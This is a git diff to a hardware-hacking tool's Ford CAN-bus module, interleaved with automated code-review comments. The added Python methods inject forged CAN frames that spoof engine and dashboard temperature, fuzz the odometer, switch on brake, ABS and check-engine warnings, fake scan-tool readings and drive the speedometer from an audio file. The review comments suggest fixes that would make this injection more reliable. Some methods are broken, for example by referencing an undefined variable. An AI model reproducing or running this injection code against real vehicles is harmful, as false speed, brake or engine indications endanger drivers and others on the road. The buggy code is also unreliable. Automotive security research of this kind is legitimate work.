X-Git-Url: http://git.rot13.org/?p=goodfet;a=blobdiff_plain;f=client%2FFordExperiments.py;h=4461acd7257ab15a53930ff6ff225eaa5cf1e528;hp=0e09b4b49a17b7c915a9abd4f9ff198b26a04f5b;hb=HEAD;hpb=617868f9572f44267cc31681f90833c18af2fd6a diff --git a/client/FordExperiments.py b/client/FordExperiments.py index 0e09b4b..4461acd 100644 --- a/client/FordExperiments.py +++ b/client/FordExperiments.py @@ -4,6 +4,7 @@ import array; import csv, time, argparse; import datetime import os +import random from random import randrange from GoodFETMCPCAN import GoodFETMCPCAN; from experiments import experiments @@ -11,6 +12,7 @@ from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication from intelhex import IntelHex; import Queue import math +import wave tT = time class FordExperiments(experiments): @@ -135,15 +137,27 @@ class FordExperiments(experiments): print packetCount; def getBackground(self,sId): + """ + This method gets the background packets for the given id. This + is a simple "background" retriever in that it returns the packet + that is of the given id that was sniffed off the bus. + """ + self.client.serInit() + self.spitSetup(500) + self.addFilter([sId,sId,sId,sId,sId,sId]) packet1 = self.client.rxpacket(); if(packet1 != None): packetParsed = self.client.packet2parsed(packet1); #keep sniffing till we read a packet - while( packet1 == None or packetParsed.get('sID') != sId ): + startTime = time.time() + while( (packet1 == None or packetParsed.get('sID') != sId) and (time.time() - startTime) < 5): packet1 = self.client.rxpacket() + print packet1 if(packet1 != None): packetParsed = self.client.packet2parsed(packet1) - + if( packet1 == None or packetParsed.get('sID') != sId): + print "exiting without packet" + #print "returning", packetParsed #recieveTime = time.time() return packetParsed 
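Review bot: On the new timeout path getBackground prints "exiting without packet" and then still reaches `return packetParsed`. If nothing arrived within the 5 seconds, the name was never bound and the return raises UnboundLocalError; if a frame with a different sID arrived, the caller receives that frame as if it were the requested one. Set `packetParsed = None` before the first `rxpacket()` and `return None` inside the timeout branch. Callers added in this commit (overHeatEngine, runOdometer, warningLightsOn) index the result with `packet['db0']` and should test for None first. The `print packet1` inside the loop looks like leftover debugging output.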
@@ -166,8 +180,50 @@ class FordExperiments(experiments): # print the packet we are transmitting print packetParsed + def oscillateMPH(self,runTime): + self.client.serInit() + self.spitSetup(500) + #FIGURE out how to clear buffers + self.addFilter([513, 513, 513, 513,513, 513], verbose=False) + packetParsed = self.getBackground(513) + packet = [] + #set data packet to match what was sniffed or at least what was input + for i in range(0,8): + idx = "db%d"%i + packet.append(packetParsed.get(idx)) + packetValue = 0 + packet[1] = packetValue; - def oscillateTemperature(self,time): + print packet + #### split SID into different regs + SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]] + packetCount = 1; + self.client.txpacket(packet); + startTime = tT.time() + while( (tT.time()-startTime) < runTime): + dt = tT.time()-startTime + inputValue = ((2.0*math.pi)/20.0)*dt + value = 35*math.sin(inputValue)+70 + print value + #if( value%4 == 0): + # packet[5] = 95 + #else: + # packet[5] = 0 + #packet[9] = int(value) + packet[5] = int(value) + print packet + self.client.txpacket(packet) + packetCount += 1 + def oscillateTemperature(self,runTime): + """ + + + """ #setup chip self.client.serInit() self.spitSetup(500) @@ -178,7 +234,7 @@ class FordExperiments(experiments): #set data packet to match what was sniffed or at least what was input for i in range(0,8): idx = "db%d"%i - packet.append(ord(packetParsed.get(idx))) + packet.append(packetParsed.get(idx)) packetValue = 0 packet[1] = packetValue; 
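Review bot: In oscillateMPH the sine value is written to `packet[5]`, which after the list is rebuilt with its five header bytes is data byte 0, not the speed byte. engineDiagnostic, added later in this commit, decodes index 5 as RPM and index 9 as speed (`mph = 1.617 * ord(packet[9]) - 63.5`), and the commented-out `#packet[9] = int(value)` suggests index 9 was intended. Either write index 9 or rename the method, and delete the commented-out lines instead of keeping them. `packetParsed.get(idx)` returns None for a missing key and getBackground can now time out, so the frame should be checked for None entries before it reaches `txpacket`. The docstring added to oscillateTemperature is empty; it should state what runTime means and which frame the method rewrites (the body continues outside the hunk).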
@@ -263,6 +319,338 @@ class FordExperiments(experiments): #send packets self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True) + def setScanToolTemp(self,temp): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([2024, 2024, 2024]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + + newTemp = math.ceil(level/1.8 + 22) + #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + ord(packet[5]),ord(packet[6]),ord(packet[7]),newTemp,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + def setEngineTemp(self,temp): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([1056, 1056, 1056,1056,1056,1056]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + + newTemp = int(math.ceil(level/1.8 + 22)) + #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, 
# pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + def overHeatEngine(self): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([1056, 1056, 1056]) + packet = self.getBackground(1056) + SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + 0xfa,packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']] + startTime = time.time() + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + while( time.time()- startTime < 10): + self.multiPacketSpit(packet0rts=True) + + def runOdometer(self): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([1056, 1056, 1056]) + packet = self.getBackground(1056) + SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + odomFuzz = random.randint(1,254) + print packet + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']] + + startTime = time.time() + packet[6] = odomFuzz; + while( time.time()- startTime < 10): + odomFuzz = random.randint(1,254) + newPacket[6] = odomFuzz + self.client.txpacket(newPacket) + + def 
setDashboardTemp(self, temp): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([1056, 1056, 1056]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + + newTemp = math.ceil(level/1.8 + 22) + #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + + def warningLightsOn(self,checkEngine, checkTransmission, transmissionOverheated, engineLight, battery, fuelCap, checkBreakSystem,ABSLight, dashB): + + if( checkBreakSystem == 1 or ABSLight == 1): + SIDlow = (530 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (530 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + print "looking for 530" + packet = self.getBackground(530) + print "found" + packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']] + if( checkBreakSystem == 1 and ABSLight == 1): + packet2[9] = 97 + elif( checkBreakSystem == 0 and ABSLight == 1): + packet2[9] = 16 + elif(checkBreakSystem==1 
and ABSLight == 0): + packet2[9] = 64 + packet2rts = True + else: + packet2rts = False + packet2 = None + print packet2 + SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + print "looking for 1056" + packet = self.getBackground(1056) + print "found" + packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']] + if( checkEngine == 1): + packet1[9] += 2; + print packet1 + if( checkTransmission == 1): + packet1[9] += 3; + print packet1 + if( transmissionOverheated == 1): + packet1[9] += 4 + print packet1 + if( engineLight == 1): + packet1[9] += 64 + print packet1 + if( fuelCap == 1): + packet1[10] = 255 + print packet1 + if( battery == 1): + packet1[7] = 33 + print packet1 + if( dashB == 1): + packet1[6] = 255 + print "hello" + self.client.serInit() + self.spitSetup(500) + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=packet1,packet1=packet2, packet0rts=True,packet1rts=packet2rts ) + starttime = time.time() + print "starting" + # spit new value for 1 second + while ((time.time()-starttime) < 10): + self.multiPacketSpit(packet0rts=True,packet1rts = packet2rts) + + def fakeScanToolFuelLevel(self,level): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([2024, 2024, 2024]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + level = int(level/.4) + #print "Fake MPH = 
1.617(%d)-63.5 = %d" %(newSpeed, mph) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + 3,65,47,level,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + def fakeOutsideTemp(self,level): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([2024, 2024, 2024,2024,2024,2024]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() + #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + newTemp = int(math.ceil(level/1.8 + 22)) + #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + print newTemp + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + 03,65,70,newTemp,0,0,0,0] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + print newPacket + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + + def fakeAbsTps(self,level): + self.client.serInit() + self.spitSetup(500) + + self.addFilter([2024, 2024, 2024]) + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + startTime = time.time() 
+ #while((time.time() - startTime) < 10): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + abstps = int(math.ceil(level/.39)) + + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + ord(packet[5]),ord(packet[6]),ord(packet[7]),abstps,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 10): + self.multiPacketSpit(packet0rts=True) + + + def mphToByteValue(self, mph): return ( mph + 63.5 ) / 1.617 @@ -279,7 +667,11 @@ class FordExperiments(experiments): self.client.rxpacket() SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 - + + SID2 = (1056 & 0x07) << 5; + SID2high = (1056 >>3) & 0xFF; + packet_odometer = [SID2high, SID2, 0 ,0,8, 65, 0, 32, 120, 0, 0, 1, 247] + startTime = time.time() #while((time.time() - startTime) < 10): @@ -312,8 +704,10 @@ class FordExperiments(experiments): # spit new value for 1 second while (time.time()-starttime < 10): - self.multiPacketSpit(packet0rts=True) - + #self.multiPacketSpit(packet0rts=True) + odomFuzz = random.randint(1,254) + packet_odometer[6] = odomFuzz + self.multiPacketSpit(packet0=newPacket, packet1 =packet_odometer,packet0rts = True, packet1rts=True) def speedometerHack(self, inputs): @@ -356,11 +750,12 @@ class FordExperiments(experiments): # spit new value for 1 second while (time.time()-starttime < 1): + self.multiPacketSpit(packet0rts=True) def rpmToByteValue(self, rpm): value = ( rpm + 61.88 ) / 64.5 - return value + return int(value) def ValueTorpm(self, value): rpm = 64.5*value - 61.88 
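Review bot: setScanToolTemp, setEngineTemp and setDashboardTemp take a parameter named `temp` but compute the byte from `level`, which is not defined in any of them, so each raises NameError once a packet has been received. Use the parameter, `newTemp = int(math.ceil(temp/1.8 + 22))`; the `int()` is also missing in setScanToolTemp and setDashboardTemp, where `math.ceil` leaves a float in the byte list. None of the computed bytes (`newTemp`, `level = int(level/.4)`, `abstps`) is checked against 0–255 before the frame is built, and `packet1[9] += 64` in warningLightsOn can push a sniffed byte past 255, so out-of-range values should be rejected or clamped. The `while (packet == None)` waits in these methods have no timeout, unlike the 5-second bound getBackground receives in this same commit.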
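Review bot: In the `@@ -312,8 +704,10 @@` hunk the loop now also sends `packet_odometer` with a random byte at index 6 on every iteration, a second effect that nothing visible in the method documents. The payload of `packet_odometer`, added in the preceding hunk, is a row of unexplained literals, and `SID2`/`SID2high` break the `SIDlow`/`SIDhigh` naming used everywhere else. Add a comment where `packet_odometer` is built stating where those bytes come from and why index 6 is randomised, and delete `#self.multiPacketSpit(packet0rts=True)` rather than leaving it commented out. The context comment `# spit new value for 1 second` no longer matches the 10-second loop. The enclosing method starts outside the hunk.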
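Review bot: `return int(value)` in rpmToByteValue truncates toward zero and accepts any magnitude, so the result is biased low and can fall outside one byte for a negative or large `rpm`. `return max(0, min(255, int(round(value))))` keeps it a valid data byte. The following hunk (`@@ -446,6 +841,7 @@`) repeats the same formula inline and then adds `newRPM = int(newRPM)`; calling `newRPM = self.rpmToByteValue(rpm)` there would keep the two conversions from drifting apart.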
@@ -446,6 +841,7 @@ class FordExperiments(experiments): # calculate our new mph and db4 value rpm = rpm + inputs[0]; newRPM = ( rpm + 61.88 ) / 64.5 + newRPM = int(newRPM) print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm) 
@@ -462,9 +858,117 @@ class FordExperiments(experiments): while (time.time()-starttime < 1): self.multiPacketSpit(packet0rts=True) + def imbeethovenbitch(self): + + + ### USUAL SETUP STUFF ###### + self.client.serInit() + self.spitSetup(500) + self.addFilter([513, 513, 513,513]) + SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + #clear buffers + self.client.rxpacket() + self.client.rxpacket() + self.client.rxpacket() + + + packet = None; + + #catch a packet to mutate + while (packet == None): + packet=self.client.rxpacket(); + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + + # NOW THE FUN STUFF!!!!! + + music = wave.open("../../contrib/ted/beethovensfifth.wav", 'r'); + print "number of frames: %d " %music.getnframes() + print "number of channels: %d " %music.getnchannels() + print "sample width: %d " %music.getsampwidth() + print "framerate: %d " %music.getframerate() + print "compression: %s " %music.getcompname() + + + numFramesToRead = music.getframerate()*.05 # grab .1s of audio + sampNum = 0 + avgprev = 0 + avg = 0 + while(1): + avgprev = avg + runningSum = 0 + + sample = music.readframes(int(numFramesToRead)) # grab .1s of audio + + length = len(sample) + + for i in range(0, length,4): + runningSum += ord(sample[i]) #average the dual-channel + runningSum += ord(sample[i+2]) + + avg = math.fabs(runningSum/(length /2) -127) # we used 2 of every 4 frames, so divide length by 2 + if( sampNum > 0): + avg = (avg+avgprev)/2 + sampNum = 1 - def runOdometer(self): - pass + val = int(avg*15 + 40) # normalize to speedometer range of values + + print "speedometerVal = %f " %val; + print "speed = %f" %(1.617*val-63.5) # speed we're trying to 
display + + if (val > 255): # ensure we don't run off acceptable range + val = 255 + elif (val < 0): + val = 0 + + newPacket[9] = int(val) # write it to the packet + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < .1): + self.multiPacketSpit(packet0rts=True) + +# read in 26 frames +# average them +# normalize to our range of values (conversion 1.6167*x-63.5 +# x --> 0 to 120 + +#sample width = 2?? +#number of frames: 7133184 +#number of channels: 2 +#sample width: 2 --> 2 bytes per sample +#framerate: 44100 + + def engineDiagnostic(self, data): + self.client.serInit() + self.spitSetup(500) + self.addFilter([513, 513, 513,513,513,513]) + + startTime = tT.time() + while((tT.time() - startTime ) < 15): + packet = None; + + #catch a packet to decode + while (packet == None): + packet=self.client.rxpacket(); + + rpm = 64.5 * ord(packet[5]) - 61.88 + mph = 1.617 * ord(packet[9]) - 63.5 + print "putting data in" + data.put("Engine RPM: %d Current Speed: %d mph\n"%(rpm, mph)) + time.sleep(.5) + + + + if __name__ == "__main__": @@ -476,7 +980,7 @@ if __name__ == "__main__": fakeVIN rpmHack ''') - parser.add_argument('verb', choices=['speedometerHack', 'rpmHack']); + parser.add_argument('verb', choices=['speedometerHack', 'rpmHack', 'thefifth']); parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None); @@ -490,5 +994,7 @@ if __name__ == "__main__": fe.rpmHack(inputs=inputs) elif( args.verb == 'fakeVIN'): fe.fakeVIN() + elif( args.verb == 'thefifth'): + fe.imbeethovenbitch()
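Review bot: The `while(1)` loop in imbeethovenbitch has no exit condition: at end of file `readframes` returns an empty string, `length` is 0, and `runningSum/(length /2)` raises ZeroDivisionError. The wave file is also never closed. Add `if not sample: break` right after the read and `music.close()` after the loop. The trailing comments say the file is 16-bit stereo, so `ord(sample[i])` and `ord(sample[i+2])` appear to read only the low byte of each sample while the `-127` centring looks written for 8-bit unsigned audio; this should be confirmed. In engineDiagnostic the inner `while (packet == None)` can block well past the 15-second bound of the outer loop when the bus is quiet.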
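Review bot: `choices` on the changed `add_argument('verb', ...)` line still omits 'fakeVIN', although the help text just above lists it and the dispatch in the last hunk keeps an `elif( args.verb == 'fakeVIN')` branch. argparse therefore rejects that verb and the branch is unreachable. Add it while this line is being edited: `choices=['speedometerHack', 'rpmHack', 'fakeVIN', 'thefifth']`. The `if __name__` block begins and ends outside these hunks, so any handling further down is not visible here.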